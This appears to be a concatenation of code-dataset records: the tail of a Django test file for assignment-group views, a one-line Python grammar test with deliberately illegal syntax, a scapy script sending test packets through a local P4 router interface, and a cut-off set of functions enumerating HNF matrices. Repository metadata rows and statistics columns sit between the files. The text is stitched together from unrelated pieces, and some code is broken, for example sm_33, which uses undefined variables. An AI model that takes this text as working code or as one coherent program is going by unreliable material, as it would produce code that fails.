testgroup = AssignmentGroup.objects.annotate_with_is_corrected_count().first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertFalse(selector.exists('.devilry-cradmin-groupitemvalue-grade'))
def test_grade_comment_summary_is_available(self):
AssignmentGroupDbCacheCustomSql().initialize()
mommy.make('core.AssignmentGroup')
testgroup = AssignmentGroup.objects.first()
selector = htmls.S(groupdetails.GroupDetailsRenderable(value=testgroup,
assignment=testgroup.assignment).render())
self.assertTrue(selector.exists('.devilry-cradmin-groupitemvalue-comments'))
self.assertEqual(
'0 comments from student. 0 files from student. 0 comments from examiner.',
selector.one('.devilry-cradmin-groupitemvalue-comments').alltext_normalized)
class TestGroupDetailsView(test.TestCase, cradmin_testhelpers.TestCaseMixin):
viewclass = groupdetails.GroupDetailsView
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def __mockinstance_with_devilryrole(self, devilryrole):
mockinstance = mock.MagicMock()
mockinstance.get_devilryrole_for_requestuser.return_value = devilryrole
return mockinstance
def test_title(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='Test User')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertIn(
'Test User',
mockresponse.selector.one('title').alltext_normalized)
def test_h1(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='Test User')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(
'Test User',
mockresponse.selector.one('h1').alltext_normalized)
def test_links(self):
testgroup = mommy.make('core.AssignmentGroup')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(2, len(mockresponse.request.cradmin_instance.reverse_url.call_args_list))
self.assertEqual(
mock.call(appname='studentoverview', args=(), viewname='INDEX', kwargs={}),
mockresponse.request.cradmin_instance.reverse_url.call_args_list[0]
)
self.assertEqual(
mock.call(appname='split_group', args=(), viewname='INDEX', kwargs={'pk': testgroup.id}),
mockresponse.request.cradmin_instance.reverse_url.call_args_list[1]
)
def test_title_multiple_candidates(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserB')
devilry_core_mommy_factories.candidate(group=testgroup,
shortname='usera')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserC')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertIn(
'usera, UserB, UserC',
mockresponse.selector.one('title').alltext_normalized)
def test_h1_multiple_candidates(self):
testgroup = mommy.make('core.AssignmentGroup')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserB')
devilry_core_mommy_factories.candidate(group=testgroup,
shortname='usera')
devilry_core_mommy_factories.candidate(group=testgroup,
fullname='UserC')
mockresponse = self.mock_http200_getrequest_htmls(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
self.assertEqual(
'usera, UserB, UserC',
mockresponse.selector.one('h1').alltext_normalized)
def test_404_fully_anonymous_subjectadmin(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
with self.assertRaises(Http404):
self.mock_getrequest(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('subjectadmin'),
viewkwargs={'pk': testgroup.id})
def test_not_404_fully_anonymous_departmentadmin(self):
testgroup = mommy.make('core.AssignmentGroup',
parentnode__anonymizationmode=Assignment.ANONYMIZATIONMODE_FULLY_ANONYMOUS)
self.mock_getrequest(
cradmin_role=testgroup.assignment,
cradmin_instance=self.__mockinstance_with_devilryrole('departmentadmin'),
viewkwargs={'pk': testgroup.id})
| 52.955556
| 108
| 0.672052
| 1,293
| 14,298
| 7.150039
| 0.123743
| 0.06782
| 0.028123
| 0.042401
| 0.848567
| 0.828664
| 0.802704
| 0.802704
| 0.780206
| 0.720498
| 0
| 0.004146
| 0.240943
| 14,298
| 269
| 109
| 53.152416
| 0.847692
| 0
| 0
| 0.733333
| 0
| 0
| 0.135683
| 0.066443
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.095833
| false
| 0.008333
| 0.054167
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3c72e29ca9f6363ac823429e84a5535d2ac7a078
| 33
|
py
|
Python
|
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/Grammar/FuncDefV3Illegal.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f(*): pass
def f(*, ): pass
| 16.5
| 16
| 0.484848
| 7
| 33
| 2.428571
| 0.571429
| 0.470588
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212121
| 33
| 2
| 17
| 16.5
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 1
| 0
| null | null | 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b1d0245d2ff57a9017be4eb87097b0232c5a3ff7
| 15,075
|
py
|
Python
|
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | 14
|
2019-02-25T22:42:15.000Z
|
2021-12-22T06:29:20.000Z
|
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | null | null | null |
p4v1_1/simple_router/send3.py
|
vibhaa/iw15
|
c2a316499dbd3e7459aed2cacf0612df0b7dcec2
|
[
"Apache-2.0"
] | 8
|
2018-11-25T11:42:24.000Z
|
2021-03-11T07:23:21.000Z
|
#!/usr/bin/python
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from scapy.all import sniff, sendp
from scapy.all import Packet
from scapy.all import ShortField, IntField, LongField, BitField
from scapy.all import Ether, IP, TCP
import networkx as nx
import sys
def main():
if len(sys.argv) != 1:
print "Usage: send3.py"
sys.exit(1)
srcmac = '00:aa:bb:00:00:00'
dstmac = '00:aa:bb:00:00:01'
port = 80
msg = 'hi'
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '100.164.100.128', dst = '43.43.40.133') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '100.164.100.128', dst = '43.43.40.133') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.123.163', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '178.31.22.70', dst = '107.28.107.71') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '144.187.28.60', dst = '1.66.27.105') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '178.31.22.70', dst = '107.28.107.71') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '108.33.126.83', dst = '1.96.222.205') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '221.240.197.5', dst = '5.252.32.90') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.90.2.206', dst = '1.96.223.244') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '166.139.87.73', dst = '65.50.22.225') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.151', dst = '1.103.139.4') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '10.72.121.3', dst = '1.102.49.27') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.181', dst = '1.64.216.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '88.152.119.231', dst = '111.205.228.206') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.61.56.89', dst = '1.96.223.155') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '107.170.178.200', dst = '43.147.200.81') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '96.111.103.68', dst = '1.107.73.178') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.181', dst = '1.64.216.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.138.120.88', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '123.236.179.105', dst = '3.237.87.51') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.119.217.194', dst = '1.96.222.230') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.119.217.194', dst = '1.96.222.230') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '112.110.10.118', dst = '1.96.166.240') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.238.4.231', dst = '1.96.167.6') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '120.178.72.26', dst = '1.96.167.113') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.139.68', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.84.70.126', dst = '1.100.159.220') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.101.136', dst = '43.237.96.251') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '194.253.242.112', dst = '153.193.46.216') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.250.18.65', dst = '1.96.167.9') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.236.126', dst = '1.96.166.250') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '131.57.76.156', dst = '153.193.46.95') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.139.98.136', dst = '5.240.144.4') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '106.84.38.210', dst = '1.2.210.83') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.46.167', dst = '1.47.68.166') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '199.76.207.73', dst = '5.252.32.94') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.48.205', dst = '1.96.223.185') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '70.142.123.53', dst = '210.108.49.173') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '120.186.203.249', dst = '1.96.166.204') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '207.136.201.127', dst = '1.96.223.181') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '167.197.111.177', dst = '1.108.198.61') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.94.42.4', dst = '3.249.221.65') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '152.124.151.163', dst = '5.252.121.56') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '5.62.244.96', dst = '210.108.49.161') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.84.66.210', dst = '1.37.115.176') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.41.147', dst = '1.96.166.164') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '117.82.4.57', dst = '1.153.193.158') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '99.158.44.98', dst = '1.47.38.193') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.106.71', dst = '1.96.223.171') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '208.39.232.165', dst = '66.216.25.163') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '130.19.222.95', dst = '43.239.34.29') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '119.238.4.231', dst = '1.96.167.6') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '106.105.195.57', dst = '1.124.228.13') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '43.62.172.236', dst = '57.35.22.70') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '153.193.150.99', dst = '221.46.220.227') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '128.45.108.137', dst = '1.96.222.237') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '65.125.163.1', dst = '5.252.100.69') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '39.148.52.166', dst = '210.108.26.25') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '39.148.52.166', dst = '210.108.26.25') / msg
sendp(p, iface = "veth0", verbose = 0)
p = Ether(src=srcmac, dst=dstmac, type=0x0800) / IP(src = '199.50.151.24', dst = '3.239.255.71') / msg
sendp(p, iface = "veth0", verbose = 0)
if __name__ == '__main__':
main()
| 66.409692
| 110
| 0.596949
| 2,581
| 15,075
| 3.483534
| 0.10926
| 0.062062
| 0.093093
| 0.155155
| 0.831165
| 0.82894
| 0.82894
| 0.82894
| 0.825715
| 0.825715
| 0
| 0.207217
| 0.192968
| 15,075
| 226
| 111
| 66.70354
| 0.53181
| 0.038939
| 0
| 0.707921
| 0
| 0
| 0.201948
| 0
| 0
| 0
| 0.038552
| 0
| 0
| 0
| null | null | 0
| 0.029703
| null | null | 0.004951
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b1f6a8338e8ac7ff8ff95ca454b0f00d64351931
| 7,227
|
py
|
Python
|
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
spHNF_manip/sm.py
|
JohnEdChristensen/NiggliOptimize
|
e90b8c66e7b7e560c460502ee24991af775c625b
|
[
"MIT"
] | null | null | null |
def sm_33(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.5, -2.0, -2.0};
a2 = {0.0, -2.0, 0.0};
a3 = {2.0, 0.0, 0.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
if (2*c)%a == 0:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_33_old(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
[[2,0,0],[0,2,0],[0.5,0,2]].
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta1 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
#gamma2 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for b in bs:
for e in es:
#gamma1 condition and gamma1 condition
gamma12 = 2*b*e/float(c)
if gamma12%f==0:
for d in range(f):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.668912,1.96676,-1.29785};
a2 = {-2.286942,2.584794,-0.29785};
a3 = {-1.0,-1.0,-1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
#gamma22 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for e in es:
for b in bs:
g12 = (2 * b * e) / float(c)
if g12%f == 0:
for d in range(f):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_2(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {-0.668912,1.96676,-1.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {1.0,1.0,1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#gamme12 and gamma22
if f%2==0:
ds = [0,f/2]
es = [0,f/2]
else:
ds = [0]
es = [0]
for e in es:
for d in ds:
for b in range(c):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_3(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {0.331088,2.96676,-0.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {-1.0,-1.0,-1.0};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if f%2==0:
es = [0,f/2]
else:
es = [0]
for e in es:
for d in range(f):
g11 = -2 * a + 2 * d
if g11%f == 0:
for b in range(c):
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_4(n):
"""Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {0.331088,2.96676,-0.29785};
a2 = {1.61803,-0.618034,-1.0};
a3 = {0.668912,-1.96676,1.29785};
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#beta12 condition
if c%2==0:
bs = [0,c/2]
else:
bs = [0]
for b in bs:
for d in range(f):
for e in range(f):
g11 = -2 * a + 2 * d - (2 * b * e / c)
if g11%f == 0:
HNF = [[a,0,0],[b,c,0],[d,e,f]]
srHNFs.append(HNF)
return srHNFs
def sm_35_5(n):
"""
Finds the symmetry preserving HNFs for the simple monoclinic
lattices with a determinant of n. Assuming A =
a1 = {1,1,1}
a2 = {1.61803,-0.618034,-1}
a3 = {-0.668912,1.96676,-1.29785}
Args:
n (int): The determinant of the HNFs.
Returns:
srHNFs (list of lists): The symmetry preserving HNFs.
"""
from opf_python.universal import get_HNF_diagonals
diags = get_HNF_diagonals(n)
srHNFs = []
for diag in diags:
a = diag[0]
c = diag[1]
f = diag[2]
#alpha 3
if (2*f)%a == 0:
for e in range(f):
#alpha 2
if (2*e)%a == 0:
for b in range(c):
b21 = 2 * e - (2 * b * e / float(a))
b31 = 2 * f - (2 * b * f / float(a))
if b21%c == 0 and b31%c == 0:
for d in range(f):
